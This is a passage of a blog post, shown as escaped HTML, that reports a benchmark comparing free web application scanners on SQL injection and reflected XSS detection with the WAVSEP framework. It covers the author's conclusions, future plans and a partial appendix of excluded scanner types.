&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066160&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Benchmark Results – SQL Injection Detection Accuracy&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The overall results of the SQL Injection benchmark are presented in the following report (PDF format): &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20v1.0.pdf&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066161&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Benchmark Drilldown – Erroneous SQL Injection Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the Error-Based SQL Injection benchmark are presented in the following report (PDF format):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20ErrorBased%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20ErrorBased%20v1.0.pdf&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066162&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Benchmark Drilldown – Blind SQL Injection Detection&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the Blind SQL Injection benchmark are presented in the following report (PDF format): &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20Blind%20v1.0.pdf&quot;&gt;http://wavsep.googlecode.com/files/Web%20Application%20Scanner%20SQLi%20Detection%20Accuracy%20-%20Blind%20v1.0.pdf&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;mso-outline-level: 1;&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Initial Analysis &amp;amp; Conclusions&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;After performing an initial analysis on the data, I have come to a simple conclusion as to which combination of tools will be &lt;b&gt;the most effective&lt;/b&gt; in detecting &lt;b&gt;Reflected&lt;/b&gt; &lt;b&gt;XSS&lt;/b&gt; vulnerabilities in the public (unauthenticated) section of a tested web site, &lt;b&gt;while providing the least amount of false positives&lt;/b&gt;:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Netsparker CE (42 cases), alongside Acunetix Free Edition (38 cases, including case 27 which is missed by Netsparker), alongside Skipfish (detects case 12 which is missed by both tools). I’d also recommend executing N-Stalker on small applications since it able to detect certain cases that none of the other tested tools can (but the XSS scanning feature is limited to 100 URLs).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Using Sandcat or Proxy Strike alongside Burp Spider/Paros Spider/External Spider can help detect additional potentially vulnerable locations (cases 10, 11, 13-15 and 17-21) that could be manually verified by a human tester.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;So combining four tools will give the best possible result of RXSS detection in the unauthenticated section of an application, using today’s free &amp;amp; open source tools… WOW, it took some time to get to that conclusion. However, scanning the public section of the application is one thing, and scanning the internal section (authenticated section) of the application is another; effectively scanning the authenticated section requires various features such as authentication support, URL scanning restrictions, manual crawling (in case damage might be caused from crawling certain URLs), etc; so the conclusions for the public section are not necessarily fit for the internal section.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;During the next few days, I’ll try and analyze the results and come to additional conclusions (internal RXSS scanning, external &amp;amp; internal SQLi scanning, etc). Simply check my blog in a few days to see which conclusions were already published.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;An updated benchmark document will be released in the WAVSEP project homepage after each addition, conclusion or change.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;A comment about accuracy and inconsistent results &lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;During the benchmark, I have executed each tool more than once, and on rare occasions, dozens of times. I have discovered that some of the tools have inconsistent results in certain fields (particularly SQL injection). The following tools produced inconsistent results in the SQLi detection field: &lt;b&gt;Skipfish&lt;/b&gt; (my guess is the inconsistencies are related to crawling problems and connection timeouts), &lt;b&gt;Oedipus&lt;/b&gt;, and probably a couple of others that I can’t remember.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;It is important to note that the 100% Reflected XSS detection ratio that &lt;b&gt;Sandcat&lt;/b&gt; and &lt;b&gt;ProxyStrike&lt;/b&gt; produce comes with a huge amount of false positives, a fact that signifies that the detection algorithm works more like a passive scanner (such as watcher by casaba), and less like an active intelligent scanner that verifies that the injection returned is sufficient to exploit the exposure in the given scope. This conclusion &lt;b&gt;does not&lt;/b&gt; necessarily pinpoint anything about other features of these scanners (for example, the SQL injection detection module of proxystrike is pretty decent), or presume that the XSS scanning features of these tools are “useless”; on the contrary, these tools can be used as means to obtain more leads for human verification, and can be very useful in the right context.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Furthermore, the 100% SQL Injection detection ratio of Wapiti needs to be further investigated since andiparos produced the same ratio when the titles of the various pages contained the word SQL (which is part of the reason that in the latest version of WAVSEP, this word does not appear anywhere).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Additional conclusions will follow.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;So What Now?&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;So now that we have plenty of statistics to analyze, and a new framework for testing scanners, it’s time to discuss the next phases.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Although the calendar tells me that it took me 9 months to conduct this research, in reality, it took me a couple of years to collect all the tools, learn how to install and use them, gather everything that was freely available for more than 5 minutes and test them all together.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;However, since my research led me to develop a whole framework for benchmarking (aside from the WAVSEP project which was already published), I believe (or at least hope) that thanks to the platform, future benchmarks will be &lt;b&gt;much&lt;/b&gt; easier to conduct, and in fact, I’m planning on updating the content of the web site (&lt;a href=&quot;http://sectooladdict.blogspot.com/&quot;&gt;http://sectooladdict.blogspot.com/&lt;/a&gt;) with additional related content on a regular basis. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;In addition to different classes of benchmarks, the following goals will be in the highest priority:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l3 level1 lfo4; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Improve the testing framework (WAVSEP); add additional test cases and additional security vulnerabilities.&lt;/li&gt;
&lt;li&gt;Perform additional benchmarks on the framework, and on a consistent basis. I&#39;m currently aiming for &lt;b&gt;one major benchmark per year&lt;/b&gt;, although I might start with twice per year, and a couple of initial releases that might come even sooner.&lt;/li&gt;
&lt;li&gt;Publish the results of tests against sample vulnerable web applications, so that some sort of feedback on other types of exposures will be available (until other types of vulnerabilities will be implemented in the framework), as well as features such as authentication support, crawling, etc.&lt;/li&gt;
&lt;li&gt;Gradually develop a framework for testing additional related features, such as authentication support, malformed HTML tolerance, abnormal response support, etc.&lt;/li&gt;
&lt;li&gt;Integration with external frameworks for assessing crawling capabilities, technology support, etc.&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I hope that this content will help the various vendors improve their tools, help pen-testers choose the right tool for each task, and in addition, help create some method of testing the numerous tools out there.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The different vendors will receive an email message from an email address designated for communicating with them. I urge them to try and contact me through that address, and not using alternative means, so I’ll be able to set my priorities properly. &lt;b&gt;I apologize in advance for any delays in my responses in the next few weeks.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #999999;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Toc281066165&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=7398976696397938525&quot; name=&quot;_Ref280855248&quot;&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Appendix A – A List of Tools &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Not Included In the Test&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The benchmark focused on web application scanners that are free to use (freeware and/or open source), are able to detect either Reflected XSS or SQL Injection vulnerabilities, and are also able to scan multiple URLs in the same execution.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;As a direct implication, the test &lt;b&gt;did NOT include&lt;/b&gt; the following types of tools:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Commercial scanners&lt;/u&gt;&lt;/b&gt; - The commercial versions of AppScan, WebInspect, Cenzic, NTOSpider, Acunetix, Netsparker, N-Stalker, WebCruiser, Sandcat and many other commercial tools that I failed to mention. Any tool in the benchmark that holds the same commercial name is actually a limited free version of the same product, and does &lt;b&gt;not&lt;/b&gt; refer (or even necessarily reflect on) the full product.&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Online Scanning Services&lt;/u&gt; &lt;/b&gt;– Online applications that remotely scan applications, including (but not limited to) Zero Day Scan, Appscan On Demand, Click To Secure, QualysGuard Web Application Scanning (Qualys), Sentinel (WhiteHat), Veracode (Veracode), VUPEN Web Application Security Scanner (VUPEN Security), WebInspect (online service - HP), WebScanService (Elanize KG), Gamascan (GAMASEC – currently offline), etc.&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Scanners without RXSS / SQLi detection features&lt;/u&gt;&lt;/b&gt;&lt;u&gt;, including (but not limited to):&lt;/u&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;LFIMap&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;phpBB-RFI Scanner&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;DotDotPawn&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;CSRF Tester &lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Passive Scanners (response analysis without verification)&lt;/u&gt;&lt;/b&gt;&lt;u&gt;, including (but not limited to):&lt;/u&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Watcher (Fiddler Plugin by Casaba Security)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Skavanger (OWASP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Pantera (OWASP)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Rat proxy (Google)&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Scanners for specific products or services (CMS scanners, Web Services Scanners, etc),&lt;/u&gt;&lt;/b&gt;&lt;u&gt; including (but not limited to):&lt;/u&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;WSDigger&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Sprajax&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;ScanAjax&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Joomscan&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Joomlascan&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Joomsq&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;WPSqli&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;White box &amp;amp; Code Review Application Scan Tools&lt;/u&gt;&lt;/b&gt;&lt;u&gt;, including (but not limited to):&lt;/u&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;PuzlBox&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;Inspathx&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;margin-left: 1.0in; mso-add-space: auto; mso-list: l0 level2 lfo6; text-indent: -.25in;&quot;&gt;&lt;span style=&quot;font-family: &#39;Courier New&#39;;&quot;&gt;o&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;   &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;etc&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l0 level1 lfo6; text-indent: -.25in;&quot;&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;Uncontrollable Scanners&lt;/u&gt;&lt;/b&gt; - scanners that can’t be controlled or restricted to scan a single site, since they either receive the list of URLs to scan from Google Dork, or continue and scan external sites that are linked to the tested site. This list currently includes the following tools (and might include more):&lt;/li&gt;
